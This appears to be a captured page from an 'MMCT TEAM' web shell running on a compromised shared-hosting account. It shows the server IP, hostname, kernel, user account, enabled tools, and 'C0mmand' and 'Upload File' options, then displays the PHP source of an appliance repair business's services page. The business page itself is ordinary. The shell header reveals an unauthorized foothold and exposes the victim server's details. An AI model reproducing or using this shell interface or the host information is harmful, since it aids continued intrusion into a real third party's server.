MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.222.164.176
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/nshomeapplianceservices.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/nshomeapplianceservices.com/services.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Appliances Repair Services In LOCATION | Appliances Rental Services In LOCATION</title>
    <meta name="description" content="rust us to provide reliable, energy-efficient, and affordable solutions for all your AC and refrigerator needs. Experience the convenience and peace of mind that comes with choosing N.S Home Appliance Services.">
    <?php include "top-links.php" ?>
    <style>
        .service{
            box-shadow:1px 1px 3px 3px grey;
            padding:10px;
        }
    </style>
</head>
<body >

<div class="page-wrapper">
    
<?php include "top-header.php" ?>

<?php include "header.php" ?>
    
    <div class="inner-banner">
        <div class="container">
            <h1>Our Services</h1>
            <ul class="breadcumb">
                <li><a href="<?php echo $wspath?>">Home</a></li>
                <li><span class="sep"><i class="fa fa-angle-right"></i></span></li>
                <li><span>Our Services</span></li>
            </ul>
        </div>
    </div>
    
     <div class="section pt-5">
        <div class="container">
            <div class="section-title text-center mb-lg-9 mb-md-7 mb-5">
                <h2 class="title"> <span>Rental Services</span></h2>
                <p>By carefully Producing, procuring, and supplying Services.</p>
            </div>
            <div class="row row-cols-lg-4 row-cols-md-4 row-cols-sm-2 row-cols-1 ">
                <?php
                    $sqltype = "SELECT * FROM `tbl_services` WHERE cat_id = 1";
                    $runtype = mysqli_query($db,$sqltype) or die("Query Not run");
                    while($datatype = mysqli_fetch_assoc($runtype)){
                ?>
                <div class="col-md-4">
                  <!-- <a href="service-detail.php"> -->
                    <div class="service text-center" style="margin-bottom: 15px;">
                        <img  width="100%" src="<?php echo $wspath?>admin/images/<?php echo $datatype['img1'];?>" alt="<?php echo $datatype['property_name']?>">
                        <div class="service-content-wrap">
                            <div class="service-content">
                                <!-- <div class="service-icon">
                                    <i class="dlicon design_compass"></i>
                                </div> -->
                                 <!--<a href=""><h3 class="title"></h3> -->
                                 <!--<li><a href=""></a></li>-->
                                <a href="<?php echo $wspath?><?php echo $datatype['url_link']?>.html"><h3 class="title btn" style="background-color:#e45842; color:white;"><?php echo $datatype['property_name']?></h3>
                                </a>
                            </div>
                        </div>
                    </div>
                  <!-- </a> -->
                </div>
                <?php } ?>
                
            </div>
        </div>
    </div>
    
     <div class="section pt-5">
        <div class="container">
            <div class="section-title text-center mb-lg-9 mb-md-7 mb-5">
                <h2 class="title"> <span>Repairing Services</span></h2>
                <p>By carefully Producing, procuring, and supplying Services.</p>
            </div>
            <div class="row row-cols-lg-4 row-cols-md-4 row-cols-sm-2 row-cols-1 ">
                <?php
                    $sqltype = "SELECT * FROM `tbl_services` WHERE cat_id = 2";
                    $runtype = mysqli_query($db,$sqltype) or die("Query Not run");
                    while($datatype = mysqli_fetch_assoc($runtype)){
                ?>
                <div class="col-md-4">
                  <!-- <a href="service-detail.php"> -->
                    <div class="service text-center" style="margin-bottom: 15px;">
                        <img  width="100%" src="<?php echo $wspath?>admin/images/<?php echo $datatype['img1'];?>" alt="<?php echo $datatype['property_name']?>">
                        <div class="service-content-wrap">
                            <div class="service-content">
                                <!-- <div class="service-icon">
                                    <i class="dlicon design_compass"></i>
                                </div> -->
                                 <!--<a href=""><h3 class="title"></h3> -->
                                 <!--<li><a href=""></a></li>-->
                                <a href="<?php echo $wspath?><?php echo $datatype['url_link']?>.html"><h3 class="title btn" style="background-color:#e45842; color:white;"><?php echo $datatype['property_name']?></h3>
                                </a>
                            </div>
                        </div>
                    </div>
                  <!-- </a> -->
                </div>
                <?php } ?>
                
            </div>
        </div>
    </div>
    
    
    
       <?php include "contact-footer-banner.php" ?>

</div><!-- /.page-wrapper -->
<?php include "footer.php" ?>
</body>
</html>
    

MMCT - 2023